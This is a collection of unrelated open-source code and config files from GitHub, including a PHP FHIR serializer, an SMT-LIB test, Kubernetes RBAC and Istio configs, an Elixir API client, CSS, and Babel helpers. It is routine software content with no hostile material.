                    throw new \InvalidArgumentException('"template" must be array of objects or null, ' . gettype($data['template']) . ' seen.');
                }
            }
        } elseif (null !== $data) {
            throw new \InvalidArgumentException('$data expected to be array of values, saw "' . gettype($data) . '"');
        }
        parent::__construct($data);
    }

    /**
     * @return string
     */
    public function __toString()
    {
        return $this->get_fhirElementName();
    }

    /**
     * Serialize to a JSON-ready array; empty list fields are omitted.
     * @return array
     */
    public function jsonSerialize()
    {
        $json = parent::jsonSerialize();
        if (0 < count($this->grouping)) {
            $json['grouping'] = [];
            foreach ($this->grouping as $grouping) {
                $json['grouping'][] = $grouping;
            }
        }
        if (0 < count($this->resource)) {
            $json['resource'] = [];
            foreach ($this->resource as $resource) {
                $json['resource'][] = $resource;
            }
        }
        if (isset($this->page)) {
            $json['page'] = $this->page;
        }
        if (0 < count($this->parameter)) {
            $json['parameter'] = [];
            foreach ($this->parameter as $parameter) {
                $json['parameter'][] = $parameter;
            }
        }
        if (0 < count($this->template)) {
            $json['template'] = [];
            foreach ($this->template as $template) {
                $json['template'][] = $template;
            }
        }
        return $json;
    }

    /**
     * Serialize to FHIR XML, appending children to $sxe (created if null).
     * @param boolean $returnSXE
     * @param \SimpleXMLElement $sxe
     * @return string|\SimpleXMLElement
     */
    public function xmlSerialize($returnSXE = false, $sxe = null)
    {
        if (null === $sxe) {
            $sxe = new \SimpleXMLElement('<ImplementationGuideDefinition xmlns="http://hl7.org/fhir"></ImplementationGuideDefinition>');
        }
        parent::xmlSerialize(true, $sxe);
        if (0 < count($this->grouping)) {
            foreach ($this->grouping as $grouping) {
                $grouping->xmlSerialize(true, $sxe->addChild('grouping'));
            }
        }
        if (0 < count($this->resource)) {
            foreach ($this->resource as $resource) {
                $resource->xmlSerialize(true, $sxe->addChild('resource'));
            }
        }
        if (isset($this->page)) {
            $this->page->xmlSerialize(true, $sxe->addChild('page'));
        }
        if (0 < count($this->parameter)) {
            foreach ($this->parameter as $parameter) {
                $parameter->xmlSerialize(true, $sxe->addChild('parameter'));
            }
        }
        if (0 < count($this->template)) {
            foreach ($this->template as $template) {
                $template->xmlSerialize(true, $sxe->addChild('template'));
            }
        }
        if ($returnSXE) {
            return $sxe;
        }
        return $sxe->saveXML();
    }
}
{ "pile_set_name": "Github" }
(set-option :produce-unsat-model-interpolants true) (set-logic QF_NIA) (declare-fun v0 () Int) (assert (let ((e1 44)) (let ((e2 (- v0 v0))) (let ((e3 (- v0))) (let ((e4 (* e3 v0))) (let ((e5 (- v0 e2))) (let ((e6 (* e1 e5))) (let ((e7 (distinct e4 e5))) (let ((e8 (distinct v0 e4))) (let ((e9 (distinct e6 e5))) (let ((e10 (= e3 e4))) (let ((e11 (< e2 e4))) (let ((e12 (ite e8 e6 e5))) (let ((e13 (ite e8 e3 v0))) (let ((e14 (ite e10 e2 e5))) (let ((e15 (ite e9 e4 v0))) (let ((e16 (ite e11 e14 v0))) (let ((e17 (ite e10 e5 e12))) (let ((e18 (ite e7 e17 e15))) (let ((e19 (>= e13 e6))) (let ((e20 (<= e5 e5))) (let ((e21 (< e15 e12))) (let ((e22 (> e15 e6))) (let ((e23 (distinct e6 e2))) (let ((e24 (> e6 e2))) (let ((e25 (> e14 v0))) (let ((e26 (<= e18 e16))) (let ((e27 (>= e5 e2))) (let ((e28 (> e5 e12))) (let ((e29 (> e12 e5))) (let ((e30 (= e13 e12))) (let ((e31 (>= e3 e14))) (let ((e32 (>= e14 e4))) (let ((e33 (distinct e15 e17))) (let ((e34 (and e7 e8 e9 e10 e11 e19 e20 e21 e22 e23 e24 e25 e26 e27 e28 e29 e30 e31 e32 e33 ))) e34 ))))))))))))))))))))))))))))))))))) (check-sat-assuming-model (v0) ((- 58))) (get-unsat-model-interpolant)
{ "pile_set_name": "Github" }
--- apiVersion: rbac.authorization.k8s.io/v1 kind: RoleBinding metadata: name: dapr-secret-reader namespace: dapr-tests roleRef: apiGroup: rbac.authorization.k8s.io kind: Role name: secret-reader subjects: - kind: ServiceAccount name: default namespace: dapr-tests --- apiVersion: rbac.authorization.k8s.io/v1 kind: Role metadata: name: secret-reader namespace: dapr-tests rules: - apiGroups: [""] resources: ["secrets"] verbs: ["get"]
{ "pile_set_name": "Github" }
/* * Copyright (c) 2017, 2018, Oracle and/or its affiliates. * * All rights reserved. * * Redistribution and use in source and binary forms, with or without modification, are * permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, this list of * conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright notice, this list of * conditions and the following disclaimer in the documentation and/or other materials provided * with the distribution. * * 3. Neither the name of the copyright holder nor the names of its contributors may be used to * endorse or promote products derived from this software without specific prior written * permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS * OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE * COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE * GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE. 
*/ package com.oracle.truffle.llvm.runtime.nodes.api; import com.oracle.truffle.api.interop.InteropException; public interface LLVMArithmetic { LLVMArithmeticOpNode createAddNode(); LLVMArithmeticOpNode createSubNode(); LLVMArithmeticOpNode createMulNode(); LLVMArithmeticOpNode createDivNode(); LLVMArithmeticOpNode createRemNode(); LLVMArithmeticCompareNode createCmpNode(); abstract class LLVMArithmeticNode extends LLVMNode { public abstract boolean canCompute(Object x, Object y); } abstract class LLVMArithmeticOpNode extends LLVMArithmeticNode { public abstract LLVMArithmetic execute(Object x, Object y) throws InteropException; } abstract class LLVMArithmeticCompareNode extends LLVMArithmeticNode { public abstract int execute(Object x, Object y) throws InteropException; } }
{ "pile_set_name": "Github" }
/* * Use of this source code is governed by the MIT license that can be * found in the LICENSE file. */ package org.rust.ide.formatter class RsStatementSemicolonFormatProcessorTest : RsFormatterTestBase() { // https://internals.rust-lang.org/t/syntax-of-block-like-expressions-in-match-arms/5025 fun `test adds semicolon after return statement`() { doTextTest(""" fn main() { return } fn foo() { return /* comment */ } fn bar() { let mut vector = match iterator.next() { None => return Vec::new(), Some(element) => {} }; } """, """ fn main() { return; } fn foo() { return; /* comment */ } fn bar() { let mut vector = match iterator.next() { None => return Vec::new(), Some(element) => {} }; } """) } fun `test adds semicolon after return statement with value`() { doTextTest(""" fn foo() -> i32 { if true { return 92 } 62 } """, """ fn foo() -> i32 { if true { return 92; } 62 } """) } fun `test adds semicolon after break`() { doTextTest(""" fn foo(cond: bool) { loop { if cond { break } } loop { if cond { break; } } 'label: loop { if cond { break 'label } } } """, """ fn foo(cond: bool) { loop { if cond { break; } } loop { if cond { break; } } 'label: loop { if cond { break 'label; } } } """) } fun `test adds semicolon after continue`() { doTextTest(""" fn foo(cond: bool) { loop { if cond { continue } } loop { if cond { continue; } } 'label: loop { if cond { continue 'label } } } """, """ fn foo(cond: bool) { loop { if cond { continue; } } loop { if cond { continue; } } 'label: loop { if cond { continue 'label; } } } """) } fun `test does not add redundant semicolon`() { val code = """ fn main() { loop { match Some(0) { Some(v) => break Some(v), None => break Some(0) } } } """; checkNotChanged(code) } }
{ "pile_set_name": "Github" }
# Copyright 2019 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # NOTE: This file is auto generated by the elixir code generator program. # Do not edit this file manually. defmodule GoogleApi.DFAReporting.V34.Api.RemarketingLists do @moduledoc """ API calls for all endpoints tagged `RemarketingLists`. """ alias GoogleApi.DFAReporting.V34.Connection alias GoogleApi.Gax.{Request, Response} @library_version Mix.Project.config() |> Keyword.get(:version, "") @doc """ Gets one remarketing list by ID. ## Parameters * `connection` (*type:* `GoogleApi.DFAReporting.V34.Connection.t`) - Connection to server * `profile_id` (*type:* `String.t`) - User profile ID associated with this request. * `id` (*type:* `String.t`) - Remarketing list ID. * `optional_params` (*type:* `keyword()`) - Optional parameters * `:"$.xgafv"` (*type:* `String.t`) - V1 error format. * `:access_token` (*type:* `String.t`) - OAuth access token. * `:alt` (*type:* `String.t`) - Data format for response. * `:callback` (*type:* `String.t`) - JSONP * `:fields` (*type:* `String.t`) - Selector specifying which fields to include in a partial response. * `:key` (*type:* `String.t`) - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token. * `:oauth_token` (*type:* `String.t`) - OAuth 2.0 token for the current user. * `:prettyPrint` (*type:* `boolean()`) - Returns response with indentations and line breaks. 
* `:quotaUser` (*type:* `String.t`) - Available to use for quota purposes for server-side applications. Can be any arbitrary string assigned to a user, but should not exceed 40 characters. * `:uploadType` (*type:* `String.t`) - Legacy upload protocol for media (e.g. "media", "multipart"). * `:upload_protocol` (*type:* `String.t`) - Upload protocol for media (e.g. "raw", "multipart"). * `opts` (*type:* `keyword()`) - Call options ## Returns * `{:ok, %GoogleApi.DFAReporting.V34.Model.RemarketingList{}}` on success * `{:error, info}` on failure """ @spec dfareporting_remarketing_lists_get( Tesla.Env.client(), String.t(), String.t(), keyword(), keyword() ) :: {:ok, GoogleApi.DFAReporting.V34.Model.RemarketingList.t()} | {:ok, Tesla.Env.t()} | {:error, any()} def dfareporting_remarketing_lists_get( connection, profile_id, id, optional_params \\ [], opts \\ [] ) do optional_params_config = %{ :"$.xgafv" => :query, :access_token => :query, :alt => :query, :callback => :query, :fields => :query, :key => :query, :oauth_token => :query, :prettyPrint => :query, :quotaUser => :query, :uploadType => :query, :upload_protocol => :query } request = Request.new() |> Request.method(:get) |> Request.url("/dfareporting/v3.4/userprofiles/{profileId}/remarketingLists/{id}", %{ "profileId" => URI.encode(profile_id, &URI.char_unreserved?/1), "id" => URI.encode(id, &(URI.char_unreserved?(&1) || &1 == ?/)) }) |> Request.add_optional_params(optional_params_config, optional_params) |> Request.library_version(@library_version) connection |> Connection.execute(request) |> Response.decode(opts ++ [struct: %GoogleApi.DFAReporting.V34.Model.RemarketingList{}]) end @doc """ Inserts a new remarketing list. ## Parameters * `connection` (*type:* `GoogleApi.DFAReporting.V34.Connection.t`) - Connection to server * `profile_id` (*type:* `String.t`) - User profile ID associated with this request. 
* `optional_params` (*type:* `keyword()`) - Optional parameters * `:"$.xgafv"` (*type:* `String.t`) - V1 error format. * `:access_token` (*type:* `String.t`) - OAuth access token. * `:alt` (*type:* `String.t`) - Data format for response. * `:callback` (*type:* `String.t`) - JSONP * `:fields` (*type:* `String.t`) - Selector specifying which fields to include in a partial response. * `:key` (*type:* `String.t`) - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token. * `:oauth_token` (*type:* `String.t`) - OAuth 2.0 token for the current user. * `:prettyPrint` (*type:* `boolean()`) - Returns response with indentations and line breaks. * `:quotaUser` (*type:* `String.t`) - Available to use for quota purposes for server-side applications. Can be any arbitrary string assigned to a user, but should not exceed 40 characters. * `:uploadType` (*type:* `String.t`) - Legacy upload protocol for media (e.g. "media", "multipart"). * `:upload_protocol` (*type:* `String.t`) - Upload protocol for media (e.g. "raw", "multipart"). 
* `:body` (*type:* `GoogleApi.DFAReporting.V34.Model.RemarketingList.t`) - * `opts` (*type:* `keyword()`) - Call options ## Returns * `{:ok, %GoogleApi.DFAReporting.V34.Model.RemarketingList{}}` on success * `{:error, info}` on failure """ @spec dfareporting_remarketing_lists_insert( Tesla.Env.client(), String.t(), keyword(), keyword() ) :: {:ok, GoogleApi.DFAReporting.V34.Model.RemarketingList.t()} | {:ok, Tesla.Env.t()} | {:error, any()} def dfareporting_remarketing_lists_insert( connection, profile_id, optional_params \\ [], opts \\ [] ) do optional_params_config = %{ :"$.xgafv" => :query, :access_token => :query, :alt => :query, :callback => :query, :fields => :query, :key => :query, :oauth_token => :query, :prettyPrint => :query, :quotaUser => :query, :uploadType => :query, :upload_protocol => :query, :body => :body } request = Request.new() |> Request.method(:post) |> Request.url("/dfareporting/v3.4/userprofiles/{profileId}/remarketingLists", %{ "profileId" => URI.encode(profile_id, &URI.char_unreserved?/1) }) |> Request.add_optional_params(optional_params_config, optional_params) |> Request.library_version(@library_version) connection |> Connection.execute(request) |> Response.decode(opts ++ [struct: %GoogleApi.DFAReporting.V34.Model.RemarketingList{}]) end @doc """ Retrieves a list of remarketing lists, possibly filtered. This method supports paging. ## Parameters * `connection` (*type:* `GoogleApi.DFAReporting.V34.Connection.t`) - Connection to server * `profile_id` (*type:* `String.t`) - User profile ID associated with this request. * `advertiser_id` (*type:* `String.t`) - Select only remarketing lists owned by this advertiser. * `optional_params` (*type:* `keyword()`) - Optional parameters * `:"$.xgafv"` (*type:* `String.t`) - V1 error format. * `:access_token` (*type:* `String.t`) - OAuth access token. * `:alt` (*type:* `String.t`) - Data format for response. 
* `:callback` (*type:* `String.t`) - JSONP * `:fields` (*type:* `String.t`) - Selector specifying which fields to include in a partial response. * `:key` (*type:* `String.t`) - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token. * `:oauth_token` (*type:* `String.t`) - OAuth 2.0 token for the current user. * `:prettyPrint` (*type:* `boolean()`) - Returns response with indentations and line breaks. * `:quotaUser` (*type:* `String.t`) - Available to use for quota purposes for server-side applications. Can be any arbitrary string assigned to a user, but should not exceed 40 characters. * `:uploadType` (*type:* `String.t`) - Legacy upload protocol for media (e.g. "media", "multipart"). * `:upload_protocol` (*type:* `String.t`) - Upload protocol for media (e.g. "raw", "multipart"). * `:active` (*type:* `boolean()`) - Select only active or only inactive remarketing lists. * `:floodlightActivityId` (*type:* `String.t`) - Select only remarketing lists that have this floodlight activity ID. * `:maxResults` (*type:* `integer()`) - Maximum number of results to return. * `:name` (*type:* `String.t`) - Allows searching for objects by name or ID. Wildcards (*) are allowed. For example, "remarketing list*2015" will return objects with names like "remarketing list June 2015", "remarketing list April 2015", or simply "remarketing list 2015". Most of the searches also add wildcards implicitly at the start and the end of the search string. For example, a search string of "remarketing list" will match objects with name "my remarketing list", "remarketing list 2015", or simply "remarketing list". * `:pageToken` (*type:* `String.t`) - Value of the nextPageToken from the previous result page. * `:sortField` (*type:* `String.t`) - Field by which to sort the list. * `:sortOrder` (*type:* `String.t`) - Order of sorted results. 
* `opts` (*type:* `keyword()`) - Call options ## Returns * `{:ok, %GoogleApi.DFAReporting.V34.Model.RemarketingListsListResponse{}}` on success * `{:error, info}` on failure """ @spec dfareporting_remarketing_lists_list( Tesla.Env.client(), String.t(), String.t(), keyword(), keyword() ) :: {:ok, GoogleApi.DFAReporting.V34.Model.RemarketingListsListResponse.t()} | {:ok, Tesla.Env.t()} | {:error, any()} def dfareporting_remarketing_lists_list( connection, profile_id, advertiser_id, optional_params \\ [], opts \\ [] ) do optional_params_config = %{ :"$.xgafv" => :query, :access_token => :query, :alt => :query, :callback => :query, :fields => :query, :key => :query, :oauth_token => :query, :prettyPrint => :query, :quotaUser => :query, :uploadType => :query, :upload_protocol => :query, :active => :query, :floodlightActivityId => :query, :maxResults => :query, :name => :query, :pageToken => :query, :sortField => :query, :sortOrder => :query } request = Request.new() |> Request.method(:get) |> Request.url("/dfareporting/v3.4/userprofiles/{profileId}/remarketingLists", %{ "profileId" => URI.encode(profile_id, &URI.char_unreserved?/1) }) |> Request.add_param(:query, :advertiserId, advertiser_id) |> Request.add_optional_params(optional_params_config, optional_params) |> Request.library_version(@library_version) connection |> Connection.execute(request) |> Response.decode( opts ++ [struct: %GoogleApi.DFAReporting.V34.Model.RemarketingListsListResponse{}] ) end @doc """ Updates an existing remarketing list. This method supports patch semantics. ## Parameters * `connection` (*type:* `GoogleApi.DFAReporting.V34.Connection.t`) - Connection to server * `profile_id` (*type:* `String.t`) - User profile ID associated with this request. * `id` (*type:* `String.t`) - RemarketingList ID. * `optional_params` (*type:* `keyword()`) - Optional parameters * `:"$.xgafv"` (*type:* `String.t`) - V1 error format. * `:access_token` (*type:* `String.t`) - OAuth access token. 
* `:alt` (*type:* `String.t`) - Data format for response. * `:callback` (*type:* `String.t`) - JSONP * `:fields` (*type:* `String.t`) - Selector specifying which fields to include in a partial response. * `:key` (*type:* `String.t`) - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token. * `:oauth_token` (*type:* `String.t`) - OAuth 2.0 token for the current user. * `:prettyPrint` (*type:* `boolean()`) - Returns response with indentations and line breaks. * `:quotaUser` (*type:* `String.t`) - Available to use for quota purposes for server-side applications. Can be any arbitrary string assigned to a user, but should not exceed 40 characters. * `:uploadType` (*type:* `String.t`) - Legacy upload protocol for media (e.g. "media", "multipart"). * `:upload_protocol` (*type:* `String.t`) - Upload protocol for media (e.g. "raw", "multipart"). * `:body` (*type:* `GoogleApi.DFAReporting.V34.Model.RemarketingList.t`) - * `opts` (*type:* `keyword()`) - Call options ## Returns * `{:ok, %GoogleApi.DFAReporting.V34.Model.RemarketingList{}}` on success * `{:error, info}` on failure """ @spec dfareporting_remarketing_lists_patch( Tesla.Env.client(), String.t(), String.t(), keyword(), keyword() ) :: {:ok, GoogleApi.DFAReporting.V34.Model.RemarketingList.t()} | {:ok, Tesla.Env.t()} | {:error, any()} def dfareporting_remarketing_lists_patch( connection, profile_id, id, optional_params \\ [], opts \\ [] ) do optional_params_config = %{ :"$.xgafv" => :query, :access_token => :query, :alt => :query, :callback => :query, :fields => :query, :key => :query, :oauth_token => :query, :prettyPrint => :query, :quotaUser => :query, :uploadType => :query, :upload_protocol => :query, :body => :body } request = Request.new() |> Request.method(:patch) |> Request.url("/dfareporting/v3.4/userprofiles/{profileId}/remarketingLists", %{ "profileId" => URI.encode(profile_id, &URI.char_unreserved?/1) }) |> 
Request.add_param(:query, :id, id) |> Request.add_optional_params(optional_params_config, optional_params) |> Request.library_version(@library_version) connection |> Connection.execute(request) |> Response.decode(opts ++ [struct: %GoogleApi.DFAReporting.V34.Model.RemarketingList{}]) end @doc """ Updates an existing remarketing list. ## Parameters * `connection` (*type:* `GoogleApi.DFAReporting.V34.Connection.t`) - Connection to server * `profile_id` (*type:* `String.t`) - User profile ID associated with this request. * `optional_params` (*type:* `keyword()`) - Optional parameters * `:"$.xgafv"` (*type:* `String.t`) - V1 error format. * `:access_token` (*type:* `String.t`) - OAuth access token. * `:alt` (*type:* `String.t`) - Data format for response. * `:callback` (*type:* `String.t`) - JSONP * `:fields` (*type:* `String.t`) - Selector specifying which fields to include in a partial response. * `:key` (*type:* `String.t`) - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token. * `:oauth_token` (*type:* `String.t`) - OAuth 2.0 token for the current user. * `:prettyPrint` (*type:* `boolean()`) - Returns response with indentations and line breaks. * `:quotaUser` (*type:* `String.t`) - Available to use for quota purposes for server-side applications. Can be any arbitrary string assigned to a user, but should not exceed 40 characters. * `:uploadType` (*type:* `String.t`) - Legacy upload protocol for media (e.g. "media", "multipart"). * `:upload_protocol` (*type:* `String.t`) - Upload protocol for media (e.g. "raw", "multipart"). 
* `:body` (*type:* `GoogleApi.DFAReporting.V34.Model.RemarketingList.t`) - * `opts` (*type:* `keyword()`) - Call options ## Returns * `{:ok, %GoogleApi.DFAReporting.V34.Model.RemarketingList{}}` on success * `{:error, info}` on failure """ @spec dfareporting_remarketing_lists_update( Tesla.Env.client(), String.t(), keyword(), keyword() ) :: {:ok, GoogleApi.DFAReporting.V34.Model.RemarketingList.t()} | {:ok, Tesla.Env.t()} | {:error, any()} def dfareporting_remarketing_lists_update( connection, profile_id, optional_params \\ [], opts \\ [] ) do optional_params_config = %{ :"$.xgafv" => :query, :access_token => :query, :alt => :query, :callback => :query, :fields => :query, :key => :query, :oauth_token => :query, :prettyPrint => :query, :quotaUser => :query, :uploadType => :query, :upload_protocol => :query, :body => :body } request = Request.new() |> Request.method(:put) |> Request.url("/dfareporting/v3.4/userprofiles/{profileId}/remarketingLists", %{ "profileId" => URI.encode(profile_id, &URI.char_unreserved?/1) }) |> Request.add_optional_params(optional_params_config, optional_params) |> Request.library_version(@library_version) connection |> Connection.execute(request) |> Response.decode(opts ++ [struct: %GoogleApi.DFAReporting.V34.Model.RemarketingList{}]) end end
{ "pile_set_name": "Github" }
## ControlEvent **ControlEvent** 专门用于描述 **UI** 控件所产生的事件,它具有以下特征: * 不会产生 `error` 事件 * 一定在 `MainScheduler` 订阅(主线程订阅) * 一定在 `MainScheduler` 监听(主线程监听) * [共享附加作用] [共享附加作用]:/content/recipes/share_side_effects.md
{ "pile_set_name": "Github" }
.hll { background-color: #ffffcc } .c { color: #60a0b0; font-style: italic } /* Comment */ .err { border: 1px solid #FF0000 } /* Error */ .k { color: #007020; font-weight: bold } /* Keyword */ .o { color: #666666 } /* Operator */ .cm { color: #60a0b0; font-style: italic } /* Comment.Multiline */ .cp { color: #007020 } /* Comment.Preproc */ .c1 { color: #60a0b0; font-style: italic } /* Comment.Single */ .cs { color: #60a0b0; background-color: #fff0f0 } /* Comment.Special */ .gd { color: #A00000 } /* Generic.Deleted */ .ge { font-style: italic } /* Generic.Emph */ .gr { color: #FF0000 } /* Generic.Error */ .gh { color: #000080; font-weight: bold } /* Generic.Heading */ .gi { color: #00A000 } /* Generic.Inserted */ .go { color: #888888 } /* Generic.Output */ .gp { color: #c65d09; font-weight: bold } /* Generic.Prompt */ .gs { font-weight: bold } /* Generic.Strong */ .gu { color: #800080; font-weight: bold } /* Generic.Subheading */ .gt { color: #0044DD } /* Generic.Traceback */ .kc { color: #007020; font-weight: bold } /* Keyword.Constant */ .kd { color: #007020; font-weight: bold } /* Keyword.Declaration */ .kn { color: #007020; font-weight: bold } /* Keyword.Namespace */ .kp { color: #007020 } /* Keyword.Pseudo */ .kr { color: #007020; font-weight: bold } /* Keyword.Reserved */ .kt { color: #902000 } /* Keyword.Type */ .m { color: #40a070 } /* Literal.Number */ .s { color: #4070a0 } /* Literal.String */ .na { color: #4070a0 } /* Name.Attribute */ .nb { color: #007020 } /* Name.Builtin */ .nc { color: #0e84b5; font-weight: bold } /* Name.Class */ .no { color: #60add5 } /* Name.Constant */ .nd { color: #555555; font-weight: bold } /* Name.Decorator */ .ni { color: #d55537; font-weight: bold } /* Name.Entity */ .ne { color: #007020 } /* Name.Exception */ .nf { color: #06287e } /* Name.Function */ .nl { color: #002070; font-weight: bold } /* Name.Label */ .nn { color: #0e84b5; font-weight: bold } /* Name.Namespace */ .nt { color: #062873; font-weight: bold } /* Name.Tag 
*/ .nv { color: #bb60d5 } /* Name.Variable */ .ow { color: #007020; font-weight: bold } /* Operator.Word */ .w { color: #bbbbbb } /* Text.Whitespace */ .mf { color: #40a070 } /* Literal.Number.Float */ .mh { color: #40a070 } /* Literal.Number.Hex */ .mi { color: #40a070 } /* Literal.Number.Integer */ .mo { color: #40a070 } /* Literal.Number.Oct */ .sb { color: #4070a0 } /* Literal.String.Backtick */ .sc { color: #4070a0 } /* Literal.String.Char */ .sd { color: #4070a0; font-style: italic } /* Literal.String.Doc */ .s2 { color: #4070a0 } /* Literal.String.Double */ .se { color: #4070a0; font-weight: bold } /* Literal.String.Escape */ .sh { color: #4070a0 } /* Literal.String.Heredoc */ .si { color: #70a0d0; font-style: italic } /* Literal.String.Interpol */ .sx { color: #c65d09 } /* Literal.String.Other */ .sr { color: #235388 } /* Literal.String.Regex */ .s1 { color: #4070a0 } /* Literal.String.Single */ .ss { color: #517918 } /* Literal.String.Symbol */ .bp { color: #007020 } /* Name.Builtin.Pseudo */ .vc { color: #bb60d5 } /* Name.Variable.Class */ .vg { color: #bb60d5 } /* Name.Variable.Global */ .vi { color: #bb60d5 } /* Name.Variable.Instance */ .il { color: #40a070 } /* Literal.Number.Integer.Long */
{ "pile_set_name": "Github" }
console.log('in main.js: ' + JSON.stringify({ __filename: __filename, __dirname: __dirname })); require('./foo');
{ "pile_set_name": "Github" }
# geddit [![GoDoc](https://godoc.org/github.com/jzelinskie/geddit?status.svg)](https://godoc.org/github.com/jzelinskie/geddit) [![Go Report Card](https://goreportcard.com/badge/github.com/jzelinskie/geddit)](https://goreportcard.com/report/github.com/jzelinskie/geddit) [![Build Status](https://api.travis-ci.org/jzelinskie/geddit.svg?branch=master)](https://travis-ci.org/jzelinskie/geddit) Geddit is a convenient abstraction for the [reddit.com](http://reddit.com) API in Go. This library is a WIP. It should have some API coverage, but does not yet include things like the new OAuth model. ## examples See [godoc](http://godoc.org/github.com/jzelinskie/geddit) for OAuth examples. Here is an example usage of the old, cookie authentication method: (NOTE: You will be heavily rate-limited by reddit's API when using cookies. Consider switching to OAuth). ```Go package main import ( "fmt" "github.com/jzelinskie/geddit" ) // Please don't handle errors this way. func main() { // Login to reddit session, _ := geddit.NewLoginSession( "novelty_account", "password", "gedditAgent v1", ) // Set listing options subOpts := geddit.ListingOptions{ Limit: 10, } // Get reddit's default frontpage submissions, _ := session.DefaultFrontpage(geddit.DefaultPopularity, subOpts) // Get our own personal frontpage submissions, _ = session.Frontpage(geddit.DefaultPopularity, subOpts) // Get specific subreddit submissions, sorted by new submissions, _ = session.SubredditSubmissions("hockey", geddit.NewSubmissions, subOpts) // Print title and author of each submission for _, s := range submissions { fmt.Printf("Title: %s\nAuthor: %s\n\n", s.Title, s.Author) } // Upvote the first post session.Vote(submissions[0], geddit.UpVote) } ```
{ "pile_set_name": "Github" }
43.591170 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 1.000000 43.694790 -0.005723 -0.022968 0.979358 -0.000330 -0.001476 -0.000042 0.999999 43.798460 -0.014220 -0.043659 1.958587 -0.001184 -0.002956 0.000123 0.999995
{ "pile_set_name": "Github" }
apiVersion: "config.istio.io/v1alpha2" kind: handler metadata: name: stdio namespace: default labels: app: mixer chart: mixer heritage: Tiller release: istio spec: compiledAdapter: stdio params: outputAsJson: true
{ "pile_set_name": "Github" }
import torch.nn as nn
import numpy as np

from sever.utils import setup_logger


class BaseModel(nn.Module):
    """Common base class for all models in this project.

    Adds a per-instance logger on top of ``torch.nn.Module`` and a
    ``__str__`` that reports the trainable-parameter count.
    """

    def __init__(self, verbose=0):
        super().__init__()
        # Logger is namespaced to the concrete subclass via `self`;
        # `verbose` controls its log level (see sever.utils.setup_logger).
        self.logger = setup_logger(self, verbose=verbose)

    def forward(self, *input):
        """Forward pass logic; subclasses must override.

        :return: Model output
        """
        raise NotImplementedError

    def __str__(self):
        """Module description plus the number of trainable parameters."""
        n_trainable = sum(
            np.prod(p.size())
            for p in self.parameters()
            if p.requires_grad
        )
        return f'{super().__str__()}\nTrainable parameters: {n_trainable}'
{ "pile_set_name": "Github" }
/*
Copyright (c) 2003-2017, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.md or http://ckeditor.com/license
*/
// Czech ('cs') localization strings for the CKEditor "liststyle" plugin.
// Keys map dialog labels / list-style names to their Czech translations;
// this object is pure data consumed by CKEDITOR's i18n machinery.
CKEDITOR.plugins.setLang( 'liststyle', 'cs', {
	armenian: 'Arménské',
	bulletedTitle: 'Vlastnosti odrážek',
	circle: 'Kroužky',
	decimal: 'Arabská čísla (1, 2, 3, atd.)',
	decimalLeadingZero: 'Arabská čísla uvozená nulou (01, 02, 03, atd.)',
	disc: 'Kolečka',
	georgian: 'Gruzínské (an, ban, gan, atd.)',
	lowerAlpha: 'Malá latinka (a, b, c, d, e, atd.)',
	lowerGreek: 'Malé řecké (alpha, beta, gamma, atd.)',
	lowerRoman: 'Malé římské (i, ii, iii, iv, v, atd.)',
	none: 'Nic',
	notset: '<nenastaveno>',
	numberedTitle: 'Vlastnosti číslování',
	square: 'Čtverce',
	start: 'Počátek',
	type: 'Typ',
	upperAlpha: 'Velká latinka (A, B, C, D, E, atd.)',
	upperRoman: 'Velké římské (I, II, III, IV, V, atd.)',
	validateStartNumber: 'Číslování musí začínat celým číslem.'
} );
{ "pile_set_name": "Github" }
"use strict"; var _getIterator = require("babel-runtime/core-js/get-iterator")["default"]; var _interopRequireDefault = require("babel-runtime/helpers/interop-require-default")["default"]; var _interopRequireWildcard = require("babel-runtime/helpers/interop-require-wildcard")["default"]; exports.__esModule = true; exports.isBinding = isBinding; exports.isReferenced = isReferenced; exports.isValidIdentifier = isValidIdentifier; exports.isLet = isLet; exports.isBlockScoped = isBlockScoped; exports.isVar = isVar; exports.isSpecifierDefault = isSpecifierDefault; exports.isScope = isScope; exports.isImmutable = isImmutable; var _retrievers = require("./retrievers"); var _esutils = require("esutils"); var _esutils2 = _interopRequireDefault(_esutils); var _index = require("./index"); var t = _interopRequireWildcard(_index); var _constants = require("./constants"); /** * Check if the input `node` is a binding identifier. */ function isBinding(node /*: Object*/, parent /*: Object*/) /*: boolean*/ { var keys = _retrievers.getBindingIdentifiers.keys[parent.type]; if (keys) { for (var i = 0; i < keys.length; i++) { var key = keys[i]; var val = parent[key]; if (Array.isArray(val)) { if (val.indexOf(node) >= 0) return true; } else { if (val === node) return true; } } } return false; } 